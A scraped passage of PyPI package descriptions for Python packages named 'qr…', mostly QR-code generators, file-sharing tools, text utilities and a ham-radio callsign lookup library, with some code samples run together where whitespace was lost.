filename. If none specified, outputs to stdout.\n --shell {none,viewbox,convex,boundary-box}\n Different types of shells to enclose the given SVG\n shape where to remove QR-code pixels. none (default):\n No shell geometry is applied. Removes pixels as per\n geometry inside the given svg. viewbox: Assume the SVG\n defined viewbox to be the shell. convex: Applies a\n convex hull. boundary-box: Applies a minimal boundary\n box around the SVG geometry.\n --ppi VALUE Pixels per inch. Can be used to override the default\n value of 96 for SVGs as defined per standard.\n --svg-area VALUE Relative area of the SVG image to occupy inside the\n QR-code (default 0.2).\n --border VALUE Amount of border pixels around the final QR-code.\n Default is 1.\n --error-correction {high,medium,low}\n QR-code error correction level. By default \"high\" for\n maximum tolerance.\n --buffer VALUE A round buffer around the SVG shape/shell to add\n (default is 0.04). The buffer is a relative measure.\n To deactivate the buffer, just pass 0 as value.\n --shape-resolution VALUE\n The interpolation resolution of circular geometry such\n as SVG circles or buffers (default 32).Noteqrpic is currently very much a prototype. It works, but the SVG parsing and\nshape extraction capabilities are in the moment limited.\nIf you encounter such a limitation or ugly output, pleasefile an issue!RoadmapBetter SVG parsing and shape extractionSupport non-vector graphics such as PNG, JPG, etc. Properly handle\nimage transparencyQR-code verification stepUse minimally necessary QR-code error correction level"} +{"package": "qrplatba", "pacakge-description": "python-qrplatbaPython library for generating QR codes for QR platba.Seehttp://qr-platba.cz/pro-vyvojare/for more information about the specification (available only in czech).fromqrplatbaimportQRPlatbaGeneratorfromdatetimeimportdatetime,timedeltadue=datetime.now()+timedelta(days=14)generator=QRPlatbaGenerator('123456789/0123',400.56,x_vs=2034456,message='text',due_date=due)img=generator.make_image()img.save('example.svg')# optional: custom box size and borderimg=generator.make_image(box_size=20,border=4)# optional: get SVG as a string.# Encoding has to be 'unicode', otherwise it will be encoded as bytessvg_data=img.to_string(encoding='unicode')InstallationTo install qrplatba, simply:$pipinstallqrplatbaNote on image file formatsThis module generates SVG file which is an XML-based vector image format. You can use various libraries and/or utilities to convert it to other vector or bitmap image formats. Below is an example how to uselibRSVGto convert SVG images.libRSVGlibRSVGrenders SVG files using cairo and supports many output image formats. It can also be used directly in console withrsvg-convertcommand.$rsvg-convert-fpdfexample.svg-oexample.pdfLicenseThis software is licensed underMIT licensesince version1.0.0.Changelog1.1.0(5 April 2023)Dropped support for Python 3.7Added pre-commit, black and ruff for code formatting1.0.0(4 April 2023)Warning:While the API is mostly backwards compatible, the look and size of the generated QR codes has changed.Updated requirements to support the latestqrcodeversionAdded support for custom output sizes usingbox_sizeandborderparametersChanged legacy setuptools topoetryDropped support for Python2.xand<3.7Changed license to MITAdded unit tests"} +{"package": "qrplatba-fpdf", "pacakge-description": "UNKNOWN"} +{"package": "qrpy", "pacakge-description": "qrpyqrpy is a simple command-line program capable of encoding and decoding basic QR codes.Installationpip install qrpyNote: You may need to additionally install zbar, as outlined in theinstallation stepsfor pyzbar.Examples\u276f qrpy encode --input \"Hello world\" --output \"hello.png\"\u276f qrpy decode --input \"hello.png\"Hello worldOmitting--outputwhen encoding will print the QR code to the console."} +{"package": "qrpypi", "pacakge-description": "QrPypiA Simple QrCode generator python packageInstallationpip install qrpypiWhat is a QR Code?A Quick Response code is a two-dimensional pictographic code used for its fast readability and comparatively large storage capacity. The code consists of black modules arranged in a square pattern on a white background. The information encoded can be made up of any kind of data (e.g., binary, alphanumeric, or Kanji symbols)Usagefrom qrpypi import qrcodeqrcode.make(\"Your url/ Text\")"} +{"package": "qrraj", "pacakge-description": "No description available on PyPI."} +{"package": "qr-rhino", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrs", "pacakge-description": "qrstool forQuarrel(and other word games)SummaryProvides word game-related tools that can be configured with custom settings, letter scores, and wordlists.Works on Python 3.6 and above. Tested on Windows 10.ContentsSummaryContentsThe qrs libraryDirect executionExample caseSettingsThe qrs libraryInstall the qrs library to use its functionality in your projects.python-mpipinstall--upgradeqrs>>>fromqrsimportbuild_settings,Ruleset>>>q=Ruleset(...build_settings(...{'max':8}...)...)>>>print(...q.solve_str('wetodlnm')...)---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW,WEM2letters-6pointsEW,OW,WE,WO>>>_Direct execution$qrs\n\nqrs:_Upon being called from the command line, it will display an input screen.Type your letters into the field, press Enter, and wait for the program to calculate the best words. Once done, choose one from the list that corresponds with the number of letters you have available or the next lowest. See the example below to find out why you might not need to use all of your spaces.Example caseHere's an example using the default program settings. Our situation is the following:We're playingQuarrel, and thus, we get eight letters.Our letters arewetodlnm.We have seven spaces to use.After installing the library, we'll open a command line and run the program.Since we know we don't need words longer than eight letters, we can minimise loading time by configuring the program to only calculate for words of that length. We can do this by passing our desired settings as command arguments:$qrs--max8qrs:_Note: this has the same effect as creating aqrs.jsonfile, then running the command from the same directory:// qrs.json\n{\"max\": 8}## from folder with qrs.json$qrsThe program will have to load a wordlist whichever way it is run. Once it finishes loading, we can input our letters and press Enter.qrs:wetodlnm---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW2letters-6pointsOW,WE,WOqrs:_This output tells us that the anagram isMELTDOWN, but we can't make that word because we can only use seven letters. In this case, our best word isMOWED(14 points). Based on this output, we also know that our opponent cannot score higher than us without all eight spaces.Note: a word likeLETDOWNscores the same number of points asMOWED, but isn't recognised as a \"best word\" in this case. This is because when words are tied for points, the program will choose the word/s with the fewest letters.The fewer letters your word has, the faster you can write it into your game. This is especially important inQuarrel, as the tiebreaker for equal points is input speed.SettingsUpon being run from the command line, the program will automatically generate (or look for) aqrs.jsonfile in the directory from which the command is run. This file contains the program's settings, which can be changed to suit your needs.When using qrs as a library, you should pass adictwith any of the following keys intobuild_settingsto generate a full settings object, then pass the output to aRulesetto create a new instance. Here are all the currently supported settings:SettingDefaultDescriptiondebugfalseShows the program's inner workings whilst calculating. Note that this may negatively affect performance on certain devices or IDEs.exclude[]List of words that the program will never output.game\"quarrel\"Determines the letter scoring system used for calculating points. The value here is passed intobuild_letter_scores(), and defaults back if invalid.include[]List of additional words for the wordlist.lowerfalseDisplays output in lowercase letters. The default setting displays capital letters to mimic the style of word games likeScrabbleandQuarrel, however some people may find lowercase output more readable.maxlongest length in wordlistDetermines the maximum word length the program will calculate for.min2Determines the minimum word length the program will calculate for.noscoresfalseDetermines whether point values for words are considered, in which case only the highest-scoring words are displayed. If you don't care about scoring, turn this on to see all words.repeatsfalseDetermines whether letters can be used more than once. Change this according to your word game's rules; for example,Scrabbletiles can only be used once in a single word, whereasNew York Times'sSpelling Beeallows the reuse of letters.When running directly:To change your settings, do one of the following:Openqrs.jsonin a text editor and change any values. Make sure to save the file once you're done.Pass the setting as a command argument like this:--setting valueIf applicable, this will automatically update the settings file.$qrs--lower--max8--debug# debug info displayed hereqrs:_Ifqrs.jsonis not in your folder, try running the program and letting it fully load. It should then create the file.After savingqrs.json, the program will not change if it's already running. Close the program and rerun it to use the changed settings."} +{"package": "qr-server", "pacakge-description": "qr_serverThis project is the extension of Flask project (https://pypi.org/project/Flask/), aimed on fast creation of web-apps with minimalistic syntax.\nThe solution provides support for basic HTTP-routing (with file sending), fast DTOs\n(data transfer objects for formalization and validation of response data),\nsimple jwt-token system, role manager (database-side rights system) and configurable logging.\nSee 'example' directory for a minimal working application built using this libraryUsage example:fromqr_server.ServerimportMethodResult,QRContextfromqr_server.ConfigimportQRYamlConfigfromqr_server.TokenManagerimportrequire_token,JwtTokenManagerfromqr_server.FlaskServerimportFlaskServerdeflogin(ctx:QRContext):login=ctx.json_data['login']password=ctx.json_data['password']user_id=ctx.repository.check_credentials(login,password)ifuser_idisNone:returnMethodResult('wrong credentials',500)user=ctx.repository.get_user_data(user_id)ifuserisNone:returnMethodResult('account not found',500)jwt_token=ctx.managers['token_manager'].make_token(user_id)returnMethodResult(JwtDTO(jwt_token))@require_token()defuser_info(ctx:QRContext,user_id):user=ctx.repository.get_user_data(user_id)ifuserisNone:returnMethodResult('account not found',500)returnMethodResult(UserInfoDTO(**user))classAuthServer(FlaskServer,AuthRepository):\"\"\"DI class\"\"\"if__name__==\"__main__\":config=QRYamlConfig()config.read_config('config.yaml')host=config['app']['host']port=config['app']['port']token_man=JwtTokenManager()token_man.load_config(config['jwt'])server=AuthServer()server.init_server(config['app'])ifconfig['app']['logging']:server.configure_logger(config['app']['logging'])server.register_manager(token_man)server.register_method('/login',login,'POST')server.register_method('/info',user_info,'GET')server.run(host,port)"} +{"package": "qrsh", "pacakge-description": "No description available on PyPI."} +{"package": "qrshare", "pacakge-description": "qrshareServe files or folders on local network with ease.For extra security provide a password--password [password]InstallpipinstallqrshareTermuxInstallTermuxfromGoogle Play.Update packages:apt update && apt upgradeSetup storage:termux-setup-storageInstall Python:pkg install pythonInstall qrshare:pip install qrshareUse as described below inTerminal.UsageTerminalServe a specific directory or fileqrshareservepath/to/shareServe the current directoryqrshareserve.Send toWindows onlyCreating a shortcut inshell:sendtoprovides for easier use of conveniencecommandlineqrshareconfig--sendtomanuallyPressWindows+rand entershell:sendto%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\SendToCreate shortcut with commandqrshare servein foldernow option qrshare should appear when you right click to a file or folderCommandlineqrshare --helpUsage:__main__.py[OPTIONS]COMMAND[ARGS]...\n\nOptions:--helpShowthismessageandexit.\n\nCommands:configchangeuserconfigurationsserveservegivenlistpathsaspergivenoptionsqrshare serve --helpUsage:__main__.pyserve[OPTIONS]PATHS...servegivenlistpathsaspergivenoptions\n\nOptions:-p,--passwordTEXTwhenprovidedeverydevicerequireauthentication--portINTEGERwaitressserverport--helpShowthismessageandexit.passwordis given preference over global passwordqrshare config --helpUsage:__main__.pyconfig[OPTIONS]changeuserconfigurations\n\nOptions:-p,--passwordTEXTsetaglobalpassword--remove-passwordremovecurrentlysetglobalpassword--sendtoresetwindows'Send To'shortcut--openopenconfigdirectory--helpShowthismessageandexit.global passwordcan be removed by setting it an empty string (\"\")Code ExamplefromqrshareimportAppapp=App(paths,debug=True)app.serve()"} +{"package": "qrshare-io-cli", "pacakge-description": "QRshare.io CLIA CLI tool for uploading files withqrshare.ioservice.It returns a QR-code with a download URL back in the consoleInstallationThe package is available athttps://pypi.org/project/qrshare-io-cli/Execute the following commandpipinstallqrshare-io-cliIf you see a warning like this:WARNING: The script qrs is installed in '/usr/local/Cellar/python@3.8/3.8.17/Frameworks/Python.framework/Versions/3.8/bin' which is not on PATH.,\nthen add the path specified about to${PATH}environment variable.E.g.echo'# Added by qrshare.io-cli'>>~/.bash_profileecho'export PATH=\"/usr/local/Cellar/python@3.8/3.8.17/Frameworks/Python.framework/Versions/3.8/bin:${PATH}\"'>>~/.bash_profileecho-e\"\\n\">>~/.bash_profileUsageqrsOutputUploading:.gitignore...\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2566\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\u2551Filename\u2551.gitignore\u2551\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\u2551Size\u255129bytes\u2551\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\u2551DownloadURL\u2551https://api2.qrshare.io/api/v2/transfer/ddl/m9jQM2Pre06l\u2551\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255dDownloading withcURLcurl--content-dispositionhttps://api2.qrshare.io/api/v2/transfer/ddl/m9jQM2Pre06lNote: make sure to use--content-dispositionparameter to keep the original filename"} +{"package": "qrstreamer", "pacakge-description": "QRStreamerCompanion program toTXQRAndroidStreams files to a set of QR codes and a GIF of those QR codes, to be decoded by the Android app.InstallationRunpip install -U qrstreamerto install the command-line tools. Make sure your pip scripts directory is in the operating system PATHUsageRun asqrstreamer --helpto see usage informationCreditsUses a slightly modified port ofanrosent's LT coding libraryto perform LT coding. Inspired by (but incompatible with)divan's TXQR for iPhones"} +{"package": "qrstu", "pacakge-description": "Q \u2013 Rainer Schwarzbach\u2019s Text UtilitiesTest conversion and transcoding utilitiesInstallation from PyPIpip install qrstuInstallation in a virtual environment is strongly recommended.UsageguessTheguessmodule can be used to automatically detect and repair encoding errors\n(duplicate UTF-8 encoding of an already UTF-8 encoded text by misreading\nthe bytes as another 8-bit encoding, eg. '\u00c3\u00a4\u00c3\u00b6\u00c3\u00bc'),\nbut as the name says, it mostly works on the basis of an educated guess.reduceThereducemodule can be used to reduce Unicode text\nin Latin script to ASCII encodable Unicode text,\nsimilar toUnidecodebut taking a different approach\n(ie. mostly wrapping functionality from the standard library moduleunicodedata).\nUnlikeUnidecodewhich also transliterates characters from non-Latin scripts,reducestubbornly refuses to handle these.You can, however, specify an optionalerrors=argument in thereduce.reduce_text()call, which is passed to the internally usedcodecs.encode()function, thus taking advance of the codecs module errors handling.transcodeThetranscodemodule provides various functions for decoding\nand encoding byte sequences to/from Unicode text.Further readingPlease see the documentation athttps://blackstream-x.gitlab.io/qrstufor detailed usage information.If you found a bug or have a feature suggestion,\nplease open an issuehere"} +{"package": "qrs-wrapper", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrt", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrtools", "pacakge-description": "No description available on PyPI."} +{"package": "qrtransfer", "pacakge-description": "No description available on PyPI."} +{"package": "qrtray", "pacakge-description": "Shows the current clipboard content as a QR code. Great to send an URL or small amount of text to your smartphone.It is already working, but I\u2019m not really happy with the code structure.Licenseqrtray, shows the current clipboard content as a QR codeCopyright (C) 2016 Andr\u00e9-Patrick BubelThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.You should have received a copy of the GNU General Public License\nalong with this program. If not, see ."} +{"package": "qrtt", "pacakge-description": "No description available on PyPI."} +{"package": "qrtt-data", "pacakge-description": "No description available on PyPI."} +{"package": "qruise-qiskit", "pacakge-description": "qruise-qiskitAdd a short description here!A longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 4.3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qruise-remote", "pacakge-description": "qruise-remoteAdd a short description here!A longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 4.3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qruise-toolset", "pacakge-description": "qruise-toolsetAdd a short description here!A longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 4.3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qrules", "pacakge-description": "Quantum Number Conservation RulesQRules is a Python package forvalidating and generating particle reactionsusing\nquantum number conservation rules. The user only has to provide a certain set of\nboundary conditions (initial and final state, allowed interaction types, expected decay\ntopologies, etc.). QRules will then span the space of allowed quantum numbers over all\nallowed decay topologies and particle instances that correspond with the sets of allowed\nquantum numbers it has found.The resulting state transition objects are particularly useful foramplitude analysis\n/ Partial Wave Analysisas they contain all information (such as expected masses,\nwidths, and spin projections) that is needed to formulate an amplitude model.Visitqrules.rtfd.iofor more information!For an overview ofupcoming releases and planned functionality, seehere.Available featuresInput: Particle databaseSource of truth: PDGPredefined particle list fileOption to overwrite and append with custom particle definitionsState transition graphFeynman graph like description of the reactionsVisualization of the decay topologyConservation rulesOpen-closed designLarge set of predefined rulesSpin/Angular momentum conservationQuark and Lepton flavor conservation (incl. isospin)Baryon number conservationEM-charge conservationParity, C-Parity, G-Parity conservationMass conservationPredefined sets of conservation rules representing Strong, EM, Weak interactionsContributeSeeCONTRIBUTING.md"} +{"package": "qrun", "pacakge-description": "No description available on PyPI."} +{"package": "qrunner", "pacakge-description": "No description available on PyPI."} +{"package": "qr-upn", "pacakge-description": "QR UPN packageThis is a small package that will generate a QR UPN.\nThe package also checks the field length for each field and the validity of the field format.\nThis ensures that the generated QR code will be valid.\nQR code validation checks were done using thissoftware.Feel free to address any issues or improvements.Installationpip install qr-upn==1.2.0Functions:All the following functions can be accessed using:fromqr_upn.utilsimport*gen_qr_upnThis function create a UPN document with a valid QR code.\nThe parameters the functionrequiresare the following:p_name: Payer namep_address: Payer addressp_post: Payer postal address and postal numberprice: Price the payer has to paydate: Date when the document is valid (DD.MM.YYYY)purpose_code: Purpose code which has to be valid (list of codes:LINK)purpose: Purpose of the paymentpay_date: Date until the bill has to be paid (DD.MM.YYYY)r_iban: Receiver IBANr_reference: Receiver reference (validated as mentioned:LINK)r_name: Receiver namer_address: Receiver addressr_post: Receiver postal address and postal numberOptional parameters:save_to: Path where the QR UPN document will be saved tosave_qr: Path where the QR code will be saved toshow: Visualize the generated QR UPN documentdata={'p_name':'JANEZ NOVAK','p_address':'Dunajska ulica 1','p_post':'1000 Ljubljana','price':'100','date':'25.04.2019','purpose_code':'SWSB','purpose':'Pla\u010dilo najemnine za marec 2019','pay_date':'30.04.2019','r_iban':'SI56037210001000102','r_ref':'SI06 125412-135-1257','r_name':'RentaCar d.o.o.','r_address':'Pohorska ulica 22','r_post':'2000 Maribor','save_to':'./test.png','save_qr':'./test_qr.png','show':True}gen_qr_upn(**data)validate_referenceFunctions that checks if the provided reference code is valid.\nIt supports the SI and RF model.\nThe function accepts a single parameter:validate_reference('SI02 5124123-62146-63720')SI_model_checkFunction that handles the SI reference model validation.SI_model_check('SI02 5124123-62146-63720')RF_model_checkFunction that handles the RF reference model validation.RF_model_check('SI02 5124123-62146-63720')"} +{"package": "qrutils", "pacakge-description": "No description available on PyPI."} +{"package": "qrwifi", "pacakge-description": "qrwifiDisplay a QR code for your wifi in the terminal.Currently only supports macOS. Create an issue if you want me to support your OS.Installationpip install qrwifiUsageqrwifi"} +{"package": "qrwr", "pacakge-description": "No description available on PyPI."} +{"package": "qrypto", "pacakge-description": "UNKNOWN"} +{"package": "qrzlib", "pacakge-description": "qrzlibPython interface to qrz.comIn order to use this interface you need to have a valid Ham radio\nlicense and a qrz.com account.Usageimportqrzlibqrz=qrzlib.QRZ()qrz.authenticate('qrz-id','xmldata-key')try:qrz.get_call('W6BSD')print(qrz.fullname,qrz.zip,qrz.latlon,qrz.grid,qrz.email)exceptQRZ.NotFoundaserr:print(err)On the first request the class QRZ get the data from the qrz web\nservice. Then, by default, the information will be cached forever.the object QRZ can also return all the fields as a dictionary of as a\njson object.In[6]:qrz.to_dict()Out[6]:{'call':'W6BSD','aliases':'KM6IGK','dxcc':'291','fname':'Fred',...'ituzone':'6','geoloc':'user','born':None}"} +{"package": "qrztools", "pacakge-description": "qrztoolsWARNING:This library is now deprecated. Usecallsignlookuptoolsinstead.QRZ API interface in PythonInstallationqrztoolsrequires Python 3.8 at minimum.# synchronous requests only$pipinstallqrztools# asynchronous aiohttp only$pipinstallqrztools[async]# both sync and 